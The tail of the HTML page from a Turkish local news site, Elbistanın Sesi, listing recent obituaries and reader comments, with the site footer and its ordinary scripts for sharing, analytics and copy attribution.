class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo"> <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a> </div> <div id="collapseTwo" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/vefatlar/haci-hasan-ugur-88-yasinda-h36890.html" title="Hacı Hasan Uğur 88 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/11/haci_hasan_ugur_88_yasinda_h36890_038ee.JPG" alt="Hacı Hasan Uğur 88 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/haci-hasan-ugur-88-yasinda-h36890.html" title="" ><span class="en-hit">1.</span> <strong>Hacı Hasan Uğur 88 yaşında</strong> <span class="en-spot en-hidden">Söğütlü mahallesinden Hacı Ahmet Efendi- Zarife Uğur ailesinin oğlu</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/sefer-burak-72-yasinda-h37181.html" title="Sefer Burak 72 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/sefer_burak_72_yasinda_h37181_547d5.jpg" alt="Sefer Burak 72 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/sefer-burak-72-yasinda-h37181.html" title="" ><span class="en-hit">2.</span> <strong>Sefer Burak 72 yaşında</strong> <span class="en-spot en-hidden">Sefer Burak 72 yaşında</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/huseyin-kuyucu-59-yasinda-h36919.html" title="Hüseyin Kuyucu 59 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/11/huseyin_kuyucu_59_yasinda_h36919_fb7db.jpg" alt="Hüseyin Kuyucu 59 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/huseyin-kuyucu-59-yasinda-h36919.html" title="" ><span class="en-hit">3.</span> <strong>Hüseyin Kuyucu 59 yaşında</strong> <span class="en-spot en-hidden">Ekinözü ilçesinden Halil Kuyucu&#039;nun oğlu Merhum Hacı ve Fikret...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/hatun-sag-81-yasinda-h36968.html" title="Hatun Sağ 81 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/12/hatun_sag_81_yasinda_h36968_23f77.jpg" alt="Hatun Sağ 81 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/hatun-sag-81-yasinda-h36968.html" title="" ><span class="en-hit">4.</span> <strong>Hatun Sağ 81 yaşında</strong> <span class="en-spot en-hidden">Ceyhan Mahallesinden merhum Ebubekir ve Münevver Bodovoğlu’nun kızları,</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/dravdincer-sogutlu-78-yasinda-h36904.html" title="Dr.Av.DİNÇER SÖĞÜTLÜ 78 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/11/dincer_sogutlu_h36904_ee492.jpg" alt="Dr.Av.DİNÇER SÖĞÜTLÜ 78 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/dravdincer-sogutlu-78-yasinda-h36904.html" title="" ><span class="en-hit">5.</span> <strong>Dr.Av.DİNÇER SÖĞÜTLÜ 78 yaşında</strong> <span class="en-spot en-hidden">Elbistan Yalak Mahallesinden merhum Hulusi Söğütlü&#039;nün oğlu,</span></a></div></li> </ul> </div> </div> </div> </div> </div> <!-- SON YORUMLAR --> <div class="sayfalar"> <div class="header"> <h5>Son Yorumlar</h5> </div> <div class="content"> <ul class="unstyled"> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/spor/elbistansporda-ibrahim-kocak-donemi-h37108.html#comment_167601" title="" >hayırlı olsun amcacım♥♥</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/mustafa-unsal-95-yasinda-h37110.html#comment_167598" title="" >ALLAH GANİ GANİ RAHMET EYLESİN MEKANI...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/saglik/yeni-hastane-ile-yogun-bakim-kapasitesi-de-artiyor-h37073.html#comment_167597" title="" >Elbistanımıza yakışır bu hastane emegi...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/sefer-burak-72-yasinda-h37181.html#comment_167596" title="" >Allah Rahmet Eylesin Ruhu Şad Mekanı Cennet...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/sefer-burak-72-yasinda-h37181.html#comment_167594" title="" >Sefer hafız merhum carsi cami müezzini...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/sefer-burak-72-yasinda-h37181.html#comment_167593" title="" >Sefer Hocamın vefatını buradan öğrenmiş...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistan-buz-tuttu-h37169.html#comment_167592" title="" >kar kış soğuk bile nasıl yakışıyor...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/sefer-burak-72-yasinda-h37181.html#comment_167591" title="" >Hocama Rabbimden rahmet yakınlarına başsağlığı...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/zeynep-gul-83-yasinda-h37145.html#comment_167590" title="" >Allah Rahmet eylesin mekanı cennet olsun,...</a></li> <li class="last"><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/ekonomi/pancardaki-polar-orani-mahkemelik-oldu-h37167.html#comment_167589" title="" >Her çiftçi örnek alsın ve bu abiyi desteklesin...</a></li> </ul> </div> </div> <!-- ARSIV --> <div class="arsiv"> <div class="header"> <h5>Arşiv</h5> </div> <div class="content"> <form action="http://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" > <select name="gun" class="day span1"> <option value="01" >01</option> <option value="02" >02</option> <option value="03" >03</option> <option value="04" >04</option> <option value="05" >05</option> <option value="06" >06</option> <option value="07" >07</option> <option value="08" >08</option> <option value="09" >09</option> <option value="10" >10</option> <option value="11" >11</option> <option value="12" >12</option> <option value="13" >13</option> <option value="14" >14</option> <option value="15" >15</option> <option value="16" >16</option> <option value="17" >17</option> <option value="18" >18</option> <option value="19" >19</option> <option value="20" >20</option> <option value="21" >21</option> <option value="22" >22</option> <option value="23" selected>23</option> <option value="24" >24</option> <option value="25" >25</option> <option value="26" >26</option> <option value="27" >27</option> <option value="28" >28</option> <option value="29" >29</option> <option value="30" >30</option> <option value="31" >31</option> </select> <select name="ay" class="month span1"> <option value="01" >Ocak</option> <option value="02" >Şubat</option> <option value="03" >Mart</option> <option value="04" >Nisan</option> <option value="05" >Mayıs</option> <option value="06" >Haziran</option> <option value="07" >Temmuz</option> <option value="08" >Ağustos</option> <option value="09" >Eylül</option> <option value="10" >Ekim</option> <option value="11" >Kasım</option> <option value="12" selected>Aralık</option> </select> <select name="yil" class="year span1"> <option value="2016" selected>2016</option> <option value="2015" >2015</option> <option value="2014" >2014</option> <option value="2013" >2013</option> <option value="2012" >2012</option> </select> <button type="submit" class="btn btn-default pull-right">Ara</button> </form> </div> </div> </div> </div> <!-- Sol Dikey Reklam --> <div class="reklam dikey sol" style="width:px;height:px;"> </div> <!-- Sağ Dikey Reklam --> <div class="reklam dikey sag ortala" style="width:159px;height:283px;"> <p style="width:159px;"><a href="http://www.elbistaninsesi.com/banner.php?id=27" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/HSG_Tur.jpg&w=159&h=283&q=90" width="159" height="283" style="width:159px;height: 283px;border:0" alt="banner27" /></a></p> <p style="width:160px;"><a href="http://www.elbistaninsesi.com/banner.php?id=29" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/pekcan_Yekerleme_YNTERNET.jpg&w=160&h=285&q=90" width="160" height="285" style="width:160px;height: 285px;border:0" alt="banner29" /></a></p> </div> </div> <!-- FOOTER --> <div id="siteFooter" class="footer"> <div class="row-fluid"> <div class="container center"> <div class="span4"> <div>Copyright © 2016 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div> <div class="footer-social"> <a href="http://facebook.com/https://www.facebook.com/elbistanin.sesi" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a> <a href="http://twitter.com/" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a> <a href="" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/google_circle-32.png" alt="GOOGLE PLUS"></a> <a href="http://www.elbistaninsesi.com/rss"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a> </div> </div> <div class="span4 text-center"> <div class="footer-logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/logo2_1.png" alt="İLAN" /></a></div> </div> <div class="span4"> <p><center> 0 (344) 415 04 15 <br> gazete@elbistaninsesi.com <br>Kızılcaoba Mah. Kışla Cad. 19/1</center> </p> </div> </div> </div> <div id="footer-alt" class="row-fluid"> <div class="container center"> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/sitene-ekle.html" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div> </div> </div> </div> <div class="row-fluid"> <div class="container center"> <div class="span12 text-center"> <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p> <p><a href="http://www.haber-sistemi.com" title="Haber Scripti">Haber Scripti</a> | <a href="http://www.tebilisim.com" title="TE Bilişim">TE Bilişim</a></p> </div> </div> </div> <div id="top" class="btn btn-inverse">Yukarı Çık</div> </div> <div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Üye Girişi</h3> </div> <div class="modal-body"> <form class="form-horizontal" action="http://www.elbistaninsesi.com/index.php?m=login&rd=http%3A%2F%2Fwww.elbistaninsesi.com%2Fihale-ilanlari%2Filan-h37216.html" method="post"> <div class="control-group"> <label class="control-label" for="inputName">Kullanıcı Adı</label> <div class="controls"> <input id="inputName" value="" name="kullanici" type="text" placeholder="Kullanıcı Adı" required> </div> </div> <div class="control-group"> <label class="control-label" for="inputPassword">Şifre</label> <div class="controls"> <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required> </div> </div> <div class="control-group"> <div class="controls"> <button type="submit" class="btn btn-info">Giriş Yap</button> </div> </div> </form> </div> <div class="modal-footer"> <a href="http://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a> <a href="http://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a> <button class="btn btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button> </div> </div> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/getshares.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.elevateZoom-3.0.8.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/system-min.js"></script> <script type="text/javascript">	new UISearch( document.getElementById( 'sb-search' ) );	$(function(){	});	$("#comment_list .text").pKisalt();	var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML;	var gsSpace = ' ';	var gsUrl = location.href;	new GetShare({ root: $(".gs-facebook"), network: "facebook", share: { }	});	new GetShare({ root: $(".gs-twitter"), network: "twitter", share: { message:gsTitle+gsSpace+gsUrl }	});	new GetShare({ root: $(".gs-google"), network: "googleplus", share: { }	});	new GetShare({ root: $(".gs-linkedin"), network: "linkedin", share: { }	});	jQuery('#anasayfayazar').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[4,4,4,4],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"off",	delay:4000,	speed:750	});	jQuery('#gununmansetleri').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[6,6,6,6],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"on",	delay:4000,	speed:750	});	$('#haber > .page-header').waypoint(function(direction) { $('#article-finished').toggleClass('hiding', direction === "up");	}, { offset: function() { return $.waypoints('viewportHeight') - $(this).height() - 750; }	});	function addLink() { var kisa_site_adi = "Elbistanın Sesi"; var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com"; var body_element = document.getElementsByTagName('body')[0]; var selection; selection = window.getSelection(); var pagelink = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi; var copytext = selection + pagelink; var newdiv = document.createElement('div'); newdiv.style.position='absolute'; newdiv.style.left='-99999px'; body_element.appendChild(newdiv); newdiv.innerHTML = copytext; selection.selectAllChildren(newdiv); window.setTimeout(function() { body_element.removeChild(newdiv); },0);	}	document.oncopy = addLink;	tebilisim('37216', 'haber', ''); </script> <!-- Google Analytics --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', analitik_ga, 'auto'); ga('send', 'pageview'); </script> <!-- End Google Analytics --> </body> </html> 